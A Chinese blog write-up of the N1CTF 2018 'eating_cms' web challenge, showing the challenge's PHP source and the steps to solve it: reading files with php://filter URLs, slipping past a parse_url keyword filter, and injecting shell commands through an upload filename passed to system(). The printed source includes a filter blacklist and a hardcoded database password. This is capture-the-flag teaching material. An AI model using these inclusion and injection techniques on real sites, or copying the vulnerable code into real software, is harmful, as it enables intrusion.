-
[N1CTF 2018]eating_cms
目录
前言:
仅记录我的知识收集。
解题:
进入环境,可以看到一个登录框。
尝试用 弱口令登录。
提示有waf ,那就先不尝试SQL注入了,访问register.php 可以注册个账号。这个是扫出来的。
登录后 来到这个页面,看到url ,应该是有任意文件读取,或者任意文件下载的
利用php伪协议读取一下 user.php , login.php ,register.php 等文件。
user.php?page=php://filter/read/convert.base64-encode/resource=user这里 没 + .php后缀是因为源码源码帮我们自动加了。
user .php
- require_once("function.php");
- if( !isset( $_SESSION['user'] )){
- Header("Location: index.php");
- }
- if($_SESSION['isadmin'] === '1'){
- $oper_you_can_do = $OPERATE_admin;
- }else{
- $oper_you_can_do = $OPERATE;
- }
- //die($_SESSION['isadmin']);
- if($_SESSION['isadmin'] === '1'){
- if(!isset($_GET['page']) || $_GET['page'] === ''){
- $page = 'info';
- }else {
- $page = $_GET['page'];
- }
- }
- else{
- if(!isset($_GET['page'])|| $_GET['page'] === ''){
- $page = 'guest';
- }else {
- $page = $_GET['page'];
- if($page === 'info')
- {
- // echo("");
- Header("Location: user.php?page=guest");
- }
- }
- }
- filter_directory();
- //if(!in_array($page,$oper_you_can_do)){
- // $page = 'info';
- //}
- include "$page.php";
- ?>
index.php
- require_once "function.php";
- if(isset($_SESSION['login'] )){
- Header("Location: user.php?page=info");
- }
- else{
- include "templates/index.html";
- }
- ?>
register
- require_once "function.php";
- if($_POST['action'] === 'register'){
- if (isset($_POST['username']) and isset($_POST['password'])){
- $user = $_POST['username'];
- $pass = $_POST['password'];
- $res = register($user,$pass);
- if($res){
- Header("Location: index.php");
- }else{
- $errmsg = "Username has been registered!";
- }
- }
- else{
- Header("Location: error_parameter.php");
- }
- }
- if (!$_SESSION['login']) {
- include "templates/register.html";
- } else {
- Header("Location : user.php?page=info");
- }
- ?>
function.php
- session_start();
- require_once "config.php";
- function Hacker()
- {
- Header("Location: hacker.php");
- die();
- }
- function filter_directory()
- {
- $keywords = ["flag","manage","ffffllllaaaaggg"];
- $uri = parse_url($_SERVER["REQUEST_URI"]);
- parse_str($uri['query'], $query);
- // var_dump($query);
- // die();
- foreach($keywords as $token)
- {
- foreach($query as $k => $v)
- {
- if (stristr($k, $token))
- hacker();
- if (stristr($v, $token))
- hacker();
- }
- }
- }
- function filter_directory_guest()
- {
- $keywords = ["flag","manage","ffffllllaaaaggg","info"];
- $uri = parse_url($_SERVER["REQUEST_URI"]);
- parse_str($uri['query'], $query);
- // var_dump($query);
- // die();
- foreach($keywords as $token)
- {
- foreach($query as $k => $v)
- {
- if (stristr($k, $token))
- hacker();
- if (stristr($v, $token))
- hacker();
- }
- }
- }
- function Filter($string)
- {
- global $mysqli;
- $blacklist = "information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password";
- $whitelist = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'(),_*`-@=+><";
- for ($i = 0; $i < strlen($string); $i++) {
- if (strpos("$whitelist", $string[$i]) === false) {
- Hacker();
- }
- }
- if (preg_match("/$blacklist/is", $string)) {
- Hacker();
- }
- if (is_string($string)) {
- return $mysqli->real_escape_string($string);
- } else {
- return "";
- }
- }
- function sql_query($sql_query)
- {
- global $mysqli;
- $res = $mysqli->query($sql_query);
- return $res;
- }
- function login($user, $pass)
- {
- $user = Filter($user);
- $pass = md5($pass);
- $sql = "select * from `albert_users` where `username_which_you_do_not_know`= '$user' and `password_which_you_do_not_know_too` = '$pass'";
- echo $sql;
- $res = sql_query($sql);
- // var_dump($res);
- // die();
- if ($res->num_rows) {
- $data = $res->fetch_array();
- $_SESSION['user'] = $data[username_which_you_do_not_know];
- $_SESSION['login'] = 1;
- $_SESSION['isadmin'] = $data[isadmin_which_you_do_not_know_too_too];
- return true;
- } else {
- return false;
- }
- return;
- }
- function updateadmin($level,$user)
- {
- $sql = "update `albert_users` set `isadmin_which_you_do_not_know_too_too` = '$level' where `username_which_you_do_not_know`='$user' ";
- echo $sql;
- $res = sql_query($sql);
- // var_dump($res);
- // die();
- // die($res);
- if ($res == 1) {
- return true;
- } else {
- return false;
- }
- return;
- }
- function register($user, $pass)
- {
- global $mysqli;
- $user = Filter($user);
- $pass = md5($pass);
- $sql = "insert into `albert_users`(`username_which_you_do_not_know`,`password_which_you_do_not_know_too`,`isadmin_which_you_do_not_know_too_too`) VALUES ('$user','$pass','0')";
- $res = sql_query($sql);
- return $mysqli->insert_id;
- }
- function logout()
- {
- session_destroy();
- Header("Location: index.php");
- }
- ?>
config.php
- error_reporting(E_ERROR | E_WARNING | E_PARSE);
- define(BASEDIR, "/var/www/html/");
- define(FLAG_SIG, 1);
- $OPERATE = array('userinfo','upload','search');
- $OPERATE_admin = array('userinfo','upload','search','manage');
- $DBHOST = "localhost";
- $DBUSER = "root";
- $DBPASS = "Nu1LCTF2018!@#qwe";
- //$DBPASS = "";
- $DBNAME = "N1CTF";
- $mysqli = @new mysqli($DBHOST, $DBUSER, $DBPASS, $DBNAME);
- if(mysqli_connect_errno()){
- echo "no sql connection".mysqli_connect_error();
- $mysqli=null;
- die();
- }
- ?>
看到 function.php里的
parse_url解析漏洞 payload 读取 ffffllllaaaaggg 文件
//user.php?page=php://filter/convert.base64-encode/resource=ffffllllaaaaggg- if (FLAG_SIG != 1){
- die("you can not visit it directly");
- }else {
- echo "you can find sth in m4aaannngggeee";
- }
- ?>
再接着去看m4aaannngggeee
- if (FLAG_SIG != 1){
- die("you can not visit it directly");
- }
- include "templates/upload.html";
- ?>
发现了templates/upload.html,进入该页面(payload:/templates/upload.html)
随便上传一个 PHP 文件,显示错误
显示了一个 upllloadddd.php
再回去用php伪协议读取一下 upllloadddd.php 的源码。
- $allowtype = array("gif","png","jpg");
- $size = 10000000;
- $path = "./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/";
- $filename = $_FILES['file']['name'];
- if(is_uploaded_file($_FILES['file']['tmp_name'])){
- if(!move_uploaded_file($_FILES['file']['tmp_name'],$path.$filename)){
- die("error:can not move");
- }
- }else{
- die("error:not an upload file!");
- }
- $newfile = $path.$filename;
- echo "file upload success
"; - echo $filename;
- $picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");
- echo "
![](data:image/png;base64,"</span>.<span class="hljs-variable">$picdata</span>.<span class="hljs-string">")
"; - if($_FILES['file']['error']>0){
- unlink($newfile);
- die("Upload file error: ");
- }
- $ext = array_pop(explode(".",$_FILES['file']['name']));
- if(!in_array($ext,$allowtype)){
- unlink($newfile);
- }
- ?>
看到这一行 有一个system 。而filename 可控,可以插入恶意代码
$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");但是我们需要找到真正的上传页面,而真正的上传页面 再前面所给的m4aaannngggeee中,
payload:/user.php?page=m4aaannngggeee
/ 被过滤了,用 分号隔开命令就好了
总结:
题不难就是有点绕
。。。
-
相关阅读:
Codeforces Round #830 (Div. 2) D1. Balance (Easy version)
视觉检测系统可以检测太阳能电池片哪些方面的缺陷?
物联网技术融合成为新趋势,LPWAN2.0泛在物联·ZETA生态大会在深圳召开
CentOS 中启动 Jar 包
【Java集合类面试十八】、ConcurrentHashMap是怎么分段分组的?
2023-10-09 LeetCode每日一题(最小和分割)
GO错误处理方式
Docker镜像仓库搭建(本地镜像推到阿里云)
虚幻引擎:RPC:远端调用
中国绿色建材行业发展前景与投资战略规划深度研究报告2022-2028年
- 原文地址:https://blog.csdn.net/snowlyzz/article/details/126865896
